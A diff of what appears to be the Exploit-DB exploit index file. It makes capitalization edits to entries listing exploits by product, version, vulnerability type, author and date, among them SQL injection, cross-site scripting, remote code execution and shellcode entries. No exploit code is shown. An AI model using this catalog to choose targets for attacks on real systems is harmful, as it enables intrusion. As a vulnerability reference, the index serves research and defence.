Execution",2014-10-09,Metasploit,windows,remote,80 34927,platforms/unix/remote/34927.rb,"F5 iControl - Remote Root Command Execution",2014-10-09,Metasploit,unix,remote,443 34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0 34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting",2014-10-09,"Frank Lycops",multiple,webapps,0 34930,platforms/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 - 'default.aspx' Cross-Site Scripting",2009-06-03,intern0t,php,webapps,0 -34931,platforms/windows/remote/34931.c,"Microsoft Windows Vista- 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",windows,remote,0 +34931,platforms/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",windows,remote,0 34932,platforms/linux/remote/34932.html,"NitroView ESM - 'ess.pm' Remote Command Execution",2010-10-26,s_n,linux,remote,0 34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0 34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component - SQL Injection / Local File Inclusion",2010-10-27,jos_ali_joe,php,webapps,0 @@ -31470,13 +31470,13 @@ id,file,description,date,author,platform,type,port 34937,platforms/php/webapps/34937.txt,"Feindura CMS Groupware - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps,0 34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 - Memory Corruption",2010-10-28,"Jokaim and nSense",windows,dos,0 34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 - Local File Inclusion / Cross-Site Scripting",2010-10-27,MustLive,php,webapps,0 -34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta - 'view.php' Directory Traversal",2009-05-29,MrDoug,php,webapps,0 +34940,platforms/php/webapps/34940.txt,"212Cafe WebBoard 2.90 Beta - 'view.php' Directory Traversal",2009-05-29,MrDoug,php,webapps,0 34941,platforms/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Parameter Cross-Site Scripting",2009-05-25,SmOk3,php,webapps,0 34942,platforms/php/webapps/34942.txt,"Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"dave b",php,webapps,0 34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",windows,remote,0 34944,platforms/php/webapps/34944.txt,"SmartOptimizer - Null Character Remote Information Disclosure",2010-11-01,"Francois Harvey",php,webapps,0 34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 - Directory Traversal",2010-11-01,"John Leitch",multiple,remote,0 -34946,platforms/php/webapps/34946.txt,"cformsII 11.5/13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 +34946,platforms/php/webapps/34946.txt,"cformsII 11.5/13.1 Plugin for Wordpress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting / SQL Injection",2010-10-30,MustLive,php,webapps,0 34948,platforms/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 - Arbitrary File Upload / Cross-Site Scripting",2010-11-01,ITSecTeam,asp,webapps,0 34949,platforms/multiple/remote/34949.py,"BroadWorks - Call Detail Record Security Bypass",2010-11-02,"Nick Freeman",multiple,remote,0 @@ -31488,7 +31488,7 @@ id,file,description,date,author,platform,type,port 34955,platforms/php/webapps/34955.txt,"Joomla! 1.5.x - SQL Error Information Disclosure",2010-11-05,"YGN Ethical Hacker Group",php,webapps,0 34956,platforms/hardware/webapps/34956.txt,"Bosch Security Systems DVR 630/650/670 Series - Multiple Vulnerabilities",2014-10-14,dun,hardware,webapps,0 34957,platforms/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Authentication Bypass",2014-10-14,Vulnerability-Lab,ios,webapps,0 -35022,platforms/php/webapps/35022.txt,"4homepages 4images 1.7.x - 'categories.php' Parameter SQL Injection",2010-11-29,"Ahmed Atif",php,webapps,0 +35022,platforms/php/webapps/35022.txt,"4homepages 4Images 1.7.x - 'categories.php' Parameter SQL Injection",2010-11-29,"Ahmed Atif",php,webapps,0 34958,platforms/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution Exploit",2014-10-14,LiquidWorm,php,webapps,0 34959,platforms/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-10-14,LiquidWorm,php,webapps,0 34978,platforms/windows/remote/34978.c,"Silo 2.1.1 - 'wintab32.dll' DLL Loading Arbitrary Code Execution",2010-11-08,"Gjoko Krstic",windows,remote,0 @@ -31504,8 +31504,8 @@ id,file,description,date,author,platform,type,port 34970,platforms/php/webapps/34970.py,"SEO Control Panel 3.6.0 - Authenticated SQL Injection",2014-10-14,"Tiago Carvalho",php,webapps,0 34971,platforms/asp/webapps/34971.txt,"Angel Learning Management System 7.3 - 'pdaview.asp' Cross-Site Scripting",2010-11-05,"Wesley Kerfoot",asp,webapps,0 34972,platforms/php/webapps/34972.txt,"Joomla! AutoArticles 3000 - 'id' Parameter SQL Injection",2010-11-05,jos_ali_joe,php,webapps,0 -34973,platforms/php/webapps/34973.txt,"WordPress FeedList 2.61.01 Plugin - 'handler_image.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 -34974,platforms/php/webapps/34974.txt,"WordPress WP Survey And Quiz Tool 1.2.1 Plugin - Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 +34973,platforms/php/webapps/34973.txt,"Wordpress FeedList 2.61.01 Plugin - 'handler_image.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 +34974,platforms/php/webapps/34974.txt,"Wordpress WP Survey And Quiz Tool 1.2.1 Plugin - Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 34982,platforms/win_x86/local/34982.rb,"Microsoft Bluetooth Personal Area Networking - (BthPan.sys) Privilege Escalation",2014-10-15,Metasploit,win_x86,local,0 34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0 34995,platforms/php/webapps/34995.txt,"Simea CMS - 'index.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0 @@ -31534,7 +31534,7 @@ id,file,description,date,author,platform,type,port 35009,platforms/php/webapps/35009.txt,"AuraCMS 1.62 - 'pdf.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 35010,platforms/osx/local/35010.c,"Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation",2010-11-22,Apple,osx,local,0 35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0 -35012,platforms/multiple/webapps/35012.txt,"ZyXEL P-660R-T1 V2 - 'HomeCurrent_Date' Parameter Cross-Site Scripting",2010-11-23,"Usman Saeed",multiple,webapps,0 +35012,platforms/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Parameter Cross-Site Scripting",2010-11-23,"Usman Saeed",multiple,webapps,0 35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",hardware,remote,0 35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 - 'email.cgi' Cross-Site Scripting",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0 35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 - member.php Multiple Parameter SQL Injection Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31551,7 +31551,7 @@ id,file,description,date,author,platform,type,port 35031,platforms/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 - SQL Injection / Cross-Site Scripting",2010-11-30,BugTracker.NET,asp,webapps,0 35033,platforms/php/remote/35033.rb,"Joomla Akeeba Kickstart - Unserialize Remote Code Execution",2014-10-21,Metasploit,php,remote,80 35034,platforms/multiple/remote/35034.rb,"HP Data Protector - EXEC_INTEGUTIL Remote Code Execution",2014-10-21,Metasploit,multiple,remote,5555 -35035,platforms/cgi/webapps/35035.txt,"Awstats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution",2010-11-30,StenoPlasma,cgi,webapps,0 +35035,platforms/cgi/webapps/35035.txt,"AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution",2010-11-30,StenoPlasma,cgi,webapps,0 35036,platforms/php/webapps/35036.txt,"Annuaire Component for Joomla! - 'id' Parameter SQL Injection",2010-12-02,"Ashiyane Digital Security Team",php,webapps,0 35037,platforms/ios/webapps/35037.txt,"iFunBox Free 1.1 iOS - File Inclusion",2014-10-22,Vulnerability-Lab,ios,webapps,8000 35038,platforms/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution",2014-10-22,Vulnerability-Lab,ios,webapps,80 @@ -31563,7 +31563,7 @@ id,file,description,date,author,platform,type,port 35044,platforms/php/webapps/35044.txt,"Alguest 1.1 - Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",php,webapps,0 35045,platforms/asp/webapps/35045.txt,"DotNetNuke 5.5.1 - 'InstallWizard.aspx' Cross-Site Scripting",2010-12-03,"Richard Brain",asp,webapps,0 35046,platforms/php/webapps/35046.txt,"Axway Secure Transport 5.1 SP2 - Arbitrary File Upload (via Cross-Site Request Forgery)",2014-10-23,"Emmanuel Law",php,webapps,0 -35047,platforms/hardware/webapps/35047.txt,"Dell SonicWall Gms 7.2.x - Code Injection",2014-10-23,Vulnerability-Lab,hardware,webapps,0 +35047,platforms/hardware/webapps/35047.txt,"Dell SonicWALL Gms 7.2.x - Code Injection",2014-10-23,Vulnerability-Lab,hardware,webapps,0 35048,platforms/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 - 'ArticlesTablelist.asp' SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 - 'faqlist.asp' SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 35050,platforms/php/webapps/35050.txt,"Alguest 1.1 - 'start' Parameter SQL Injection",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31572,7 +31572,7 @@ id,file,description,date,author,platform,type,port 35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 -35057,platforms/php/webapps/35057.py,"Creative Contact Form (WordPress 0.9.7 and Joomla 2.0.0) Plugin - Arbitrary File Upload",2014-10-25,"Claudio Viviani",php,webapps,0 +35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) Plugin - Arbitrary File Upload",2014-10-25,"Claudio Viviani",php,webapps,0 35058,platforms/bsd/dos/35058.c,"OpenBSD 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 40099,platforms/multiple/dos/40099.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (5)",2016-07-13,COSIG,multiple,dos,0 40100,platforms/multiple/dos/40100.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (6)",2016-07-13,COSIG,multiple,dos,0 @@ -31586,14 +31586,14 @@ id,file,description,date,author,platform,type,port 35063,platforms/php/webapps/35063.txt,"Zimplit CMS - zimplit.php file Parameter Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35064,platforms/php/webapps/35064.txt,"Zimplit CMS - English_manual_version_2.php client Parameter Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0 -35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 - 'pluginurl' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 -35067,platforms/php/webapps/35067.txt,"WordPress Safe Search Plugin 'v1' Parameter - Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 +35066,platforms/php/webapps/35066.txt,"Wordpress Processing Embed Plugin 0.5 - 'pluginurl' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 +35067,platforms/php/webapps/35067.txt,"Wordpress Safe Search Plugin 'v1' Parameter - Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 35068,platforms/hardware/remote/35068.txt,"pfSense - pkg_edit.php id Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 35069,platforms/hardware/remote/35069.txt,"pfSense - pkg.php xml Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 35070,platforms/hardware/remote/35070.txt,"pfSense - status_graph.php if Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 35071,platforms/hardware/remote/35071.txt,"pfSense - interfaces.php if Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 35072,platforms/php/webapps/35072.txt,"Drupal Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities",2010-12-08,"Justin Klein Keane",php,webapps,0 -35073,platforms/php/webapps/35073.txt,"WordPress CP Multi View Event Calendar 1.01 Plugin - SQL Injection",2014-10-27,"Claudio Viviani",php,webapps,80 +35073,platforms/php/webapps/35073.txt,"Wordpress CP Multi View Event Calendar 1.01 Plugin - SQL Injection",2014-10-27,"Claudio Viviani",php,webapps,80 35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - (.wav) Buffer Overflow",2014-10-27,metacom,windows,local,0 35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0 35076,platforms/multiple/webapps/35076.py,"HP Operations Agent - Remote Cross-Site Scripting iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383 @@ -31604,7 +31604,7 @@ id,file,description,date,author,platform,type,port 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0 35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution",2014-10-27,Vulnerability-Lab,ios,webapps,1861 35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent Cross-Site Scripting",2014-10-27,Vulnerability-Lab,ios,webapps,0 -35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter - Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 +35084,platforms/php/webapps/35084.txt,"Wordpress Twitter Feed Plugin 'url' Parameter - Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0 35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0 @@ -31653,13 +31653,13 @@ id,file,description,date,author,platform,type,port 35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 - Cross-Site Scripting / Directory Traversal",2010-12-21,waraxe,windows,remote,0 35131,platforms/php/webapps/35131.txt,"Social Share - 'username' Parameter SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) - Arbitrary Shell Command Injection",2010-12-21,"Jan Fry",linux,remote,0 -35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 +35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for Wordpress - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps,0 35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! - SQL Injection",2010-12-22,R4dc0re,php,webapps,0 -35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 - 'email' Parameter Cross-Site Scripting",2010-12-22,clshack,php,webapps,0 +35136,platforms/php/webapps/35136.txt,"Wordpress Accept Signups Plugin 0.1 - 'email' Parameter Cross-Site Scripting",2010-12-22,clshack,php,webapps,0 35137,platforms/php/webapps/35137.txt,"Social Share - 'vote.php' HTTP Response Splitting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - Cross-Site Scripting",2014-11-02,evi1m0,php,webapps,0 -35212,platforms/php/webapps/35212.txt,"XCloner WordPress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 +35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 35140,platforms/php/webapps/35140.txt,"MyBB 1.6 - search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35141,platforms/php/webapps/35141.txt,"MyBB 1.6 - private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35142,platforms/php/webapps/35142.txt,"Social Share - 'search' Parameter Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31671,7 +31671,7 @@ id,file,description,date,author,platform,type,port 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0 35150,platforms/php/webapps/35150.php,"Drupal Core < 7.32 - Pre-Authenticated SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) - 'Patch' DLM",2014-11-03,Metasploit,hardware,remote,9100 -35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 +35153,platforms/osx/dos/35153.c,"Mac OSX Mavericks - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",asp,dos,0 35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 - help.php Multiple Parameter Cross-Site Scripting",2010-12-28,waraxe,php,webapps,0 @@ -31714,10 +31714,10 @@ id,file,description,date,author,platform,type,port 35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0 35202,platforms/windows/dos/35202.py,"Microsoft Internet Explorer 11 - Denial Of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0 35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0 -35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent & Alphanumeric execve(_/bin/sh\0__NULL_NULL); shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0 -35204,platforms/php/webapps/35204.txt,"Another WordPress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0 +35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent & Alphanumeric execve(_/bin/sh\0__NULL_NULL); Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0 +35204,platforms/php/webapps/35204.txt,"Another Wordpress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0 35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"XLabs Security",php,webapps,0 -35313,platforms/php/webapps/35313.txt,"WordPress SP Client Document Manager Plugin 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",php,webapps,80 +35313,platforms/php/webapps/35313.txt,"Wordpress SP Client Document Manager Plugin 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",php,webapps,80 35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0 35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0 35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Parameter Cross-Site Scripting",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0 @@ -31728,7 +31728,7 @@ id,file,description,date,author,platform,type,port 35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - (picture.php rate parameter) SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File - (CdrTxt.dll) Off-By-One Stack Corruption",2014-11-12,LiquidWorm,windows,dos,0 -35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Persistent Cross-Site Scripting",2014-11-12,"Halil Dalabasmaz",php,webapps,80 +35218,platforms/php/webapps/35218.txt,"Wordpress SupportEzzy Ticket System Plugin 1.2.5 - Persistent Cross-Site Scripting",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 35220,platforms/multiple/webapps/35220.txt,"Joomla HD FLV Player < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",multiple,webapps,0 35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal",2014-11-13,"Anastasios Monachos",jsp,webapps,0 @@ -31758,43 +31758,43 @@ id,file,description,date,author,platform,type,port 35246,platforms/php/webapps/35246.py,"Joomla HD FLV Player < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0 35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - Cross-Site Scripting",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0 35293,platforms/php/webapps/35293.txt,"VirtueMart eCommerce Component 1.1.6 for Joomla! - SQL Injection",2011-01-31,"Andrea Fabrizi",php,webapps,0 -35288,platforms/php/webapps/35288.txt,"WordPress oQey-Gallery Plugin 0.2 - 'tbpv_domain' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 -35289,platforms/php/webapps/35289.txt,"WordPress FCChat Widget Plugin 2.1.7 - 'path' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35288,platforms/php/webapps/35288.txt,"Wordpress oQey-Gallery Plugin 0.2 - 'tbpv_domain' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 +35289,platforms/php/webapps/35289.txt,"Wordpress FCChat Widget Plugin 2.1.7 - 'path' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 - 'guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0 35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 - 'admin/index.php' SQL Injection",2011-01-20,"High-Tech Bridge SA",php,webapps,0 35252,platforms/multiple/remote/35252.php,"libxml2 2.6.x - 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure",2011-01-24,"Kees Cook",multiple,remote,0 35253,platforms/php/webapps/35253.txt,"web@all 1.1 - 'url' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35254,platforms/php/webapps/35254.txt,"PivotX 2.2.2 - 'module_image.php' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 -35255,platforms/php/webapps/35255.txt,"WordPress Uploader Plugin 1.0 - 'num' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 +35255,platforms/php/webapps/35255.txt,"Wordpress Uploader Plugin 1.0 - 'num' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35273,platforms/windows/remote/35273.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0 35256,platforms/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 - Arbitrary File Upload",2011-01-25,StenoPlasma,cfm,webapps,0 -35257,platforms/php/webapps/35257.txt,"WordPress Videox7 UGC Plugin 2.5.3.2 - 'listid' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 -35258,platforms/php/webapps/35258.txt,"WordPress Audio Plugin 0.5.1 - 'showfile' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 +35257,platforms/php/webapps/35257.txt,"Wordpress Videox7 UGC Plugin 2.5.3.2 - 'listid' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35258,platforms/php/webapps/35258.txt,"Wordpress Audio Plugin 0.5.1 - 'showfile' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 35259,platforms/php/webapps/35259.txt,"PivotX 2.2 - pivotx/includes/blogroll.php color Parameter Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps,0 35260,platforms/php/webapps/35260.txt,"PivotX 2.2 - pivotx/includes/timwrapper.php src Parameter Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps,0 -35261,platforms/php/webapps/35261.txt,"RSS Feed Reader WordPress Plugin 0.1 - 'rss_url' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 -35262,platforms/php/webapps/35262.txt,"WordPress WP Featured Post with Thumbnail Plugin 3.0 - 'src' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 -35263,platforms/php/webapps/35263.txt,"WordPress WP Publication Archive Plugin 2.0.1 - 'file' Parameter Information Disclosure",2011-01-23,"AutoSec Tools",php,webapps,0 -35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 - 'listid' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 -35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 Plugin - 'uploadImage.php' Arbitrary File Upload",2011-01-25,"AutoSec Tools",php,webapps,0 +35261,platforms/php/webapps/35261.txt,"RSS Feed Reader Wordpress Plugin 0.1 - 'rss_url' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 +35262,platforms/php/webapps/35262.txt,"Wordpress WP Featured Post with Thumbnail Plugin 3.0 - 'src' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 +35263,platforms/php/webapps/35263.txt,"Wordpress WP Publication Archive Plugin 2.0.1 - 'file' Parameter Information Disclosure",2011-01-23,"AutoSec Tools",php,webapps,0 +35264,platforms/php/webapps/35264.txt,"Wordpress Featured Content Plugin 0.0.1 - 'listid' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35265,platforms/php/webapps/35265.php,"Wordpress Recip.ly 1.1.7 Plugin - 'uploadImage.php' Arbitrary File Upload",2011-01-25,"AutoSec Tools",php,webapps,0 35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Persistent Cross-Site Scripting",2014-11-17,"Avinash Thapa",php,webapps,0 35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass (1)",2014-11-17,"Project Zero Labs",hardware,webapps,0 35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 35284,platforms/multiple/remote/35284.pl,"Opera Web Browser 11.00 - 